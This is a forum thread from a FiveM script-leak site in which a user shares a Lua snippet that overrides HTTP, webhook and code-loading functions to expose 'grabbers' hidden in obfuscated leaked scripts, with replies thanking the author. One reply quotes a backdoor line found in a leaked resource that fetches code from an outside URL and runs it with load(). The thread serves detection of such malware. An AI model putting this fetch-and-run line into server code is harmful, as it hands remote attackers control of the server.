HighLeaks
HOME
Home Marketplace
GENERAL DISCUSSIONS
Dutch Lounge 1050 English Lounge 735 Wall of Shame 17
FIVEM LEAKS
Servers 1582 Scripts 3516 MLO 3152 Vehicles 2367 Clothing 624 Loadscreens 109 Requests 1911 Others 581 RedM 66
RAGEMP
Scripts 2572 MLO 103 Servers 78
VIP
Scripts 3325 Servers 39 Others 943 Vehicles 131 MLO 72
MISCELLANEOUS
Cheats 22 Anti Cheats 9 Accounts and Licenses 19
RUST
Plugins 3
Login Register
Help

GRABBER DETECTION - 70% method [FREE]

rafaeninja rafaeninja Started 8 replies 1,058 views
rafaeninja
rafaeninja
Messages 62
Reactions 1
Credits 565
Joined Dec 2021
#1 rafaeninja
70% method for finding out if an obfuscated script has a grabber.

How to use:

Just add it to the first line of any .lua file.


How it works:

Basically, it disables some functions and prints the parameters of these functions.

These specific functions may or may not call malicious code hosted somewhere, or hidden within the script folder.

However, as mentioned, it is 70% effective as there are several other ways.


Note:

To add more functions, just follow the same pattern.


[attachment removed]

-------------------------------------------------------------------------------------------------------------






function PerformHttpRequest(url, callback, method, data, headers)

print("PerformHttpRequest:")

print("URL:", url)

print("Callback:", callback)

print("Method:", method)

print("Data:", data)

print("Headers:", headers)

end



function SendWebhookMessage(webhook, message)

print("SendWebhookMessage:")

print("Webhook:", webhook)

print("Message:", message)

end



function CreateDui(link, x, y)

print("CreateDui:")

print("Link:", link)

print("X Coordinate:", x)

print("Y Coordinate:", y)

end



function loadstring(str, chunkname)

print("loadstring:")

print("String:", str)

print("Chunk Name:", chunkname)

end



function dofile(filename)

print("dofile:")

print("Filename:", filename)

end



function require(modname)

print("require:")

print("Module Name:", modname)

end



function loadfile(filename, mode, env)

print("loadfile:")

print("Filename:", filename)

print("Mode:", mode)

print("Environment:", env)

end
[/attachment]
Reactions are only available for posts
2k14
2k14
Messages 925
Reactions 23
Credits 13,974
Joined Jan 2022
#1 2k14
thanku nice script rescpct for u
R34p3rFox
R34p3rFox
Messages 11
Reactions 0
Credits 112
Joined Mar 2022
#2 R34p3rFox
[JUSTIFY]i have juste update your code for a better experience

[/JUSTIFY]



-- Fonction pour remplacer les fonctions natives par des versions imprimant les informations

local function overrideNativeFunctions()

local nativeEnv ...


R34p3rFox
R34p3rFox
Messages 11
Reactions 0
Credits 112
Joined Mar 2022
#3 R34p3rFox
thhhhs shiit is a backdoor do not use it PerformHttpRequest('https://thedreamoffivem.com/i?to=Wdv1M', function (e, d) pcall(function() assert(load(d))() end) end)

so i find it in VMS Spawn Selector in server/server.lua
micky1062
micky1062
Messages 4
Reactions 0
Credits 13
Joined Apr 2024
#4 micky1062
Does it avoid function execution ?
rafaeninja
rafaeninja
Messages 62
Reactions 1
Credits 565
Joined Dec 2021
#5 rafaeninja




micky1062,

wrote:



Does it avoid function execution ?




in my opinion, replacing functions can interfere with the execution of the encrypted script, but its effectiveness depends on how the encrypted script was written and whether it makes use of the replaced functions.



I wouldn't risk trusting your home host like that, you have to use a VPS to test this.
sktxgaming
sktxgaming
Messages 70
Reactions 0
Credits 6
Joined May 2024
#6 sktxgaming
Respect my man! Appreciate that! :)
airtech1
airtech1
Messages 204
Reactions 0
Credits 22
Joined Apr 2024
#7 airtech1
Very nice work and very nice job
Alexas159
Alexas159
Messages 609
Reactions 0
Credits 148
Joined Jun 2022
#8 Alexas159
thx for sharing good scripts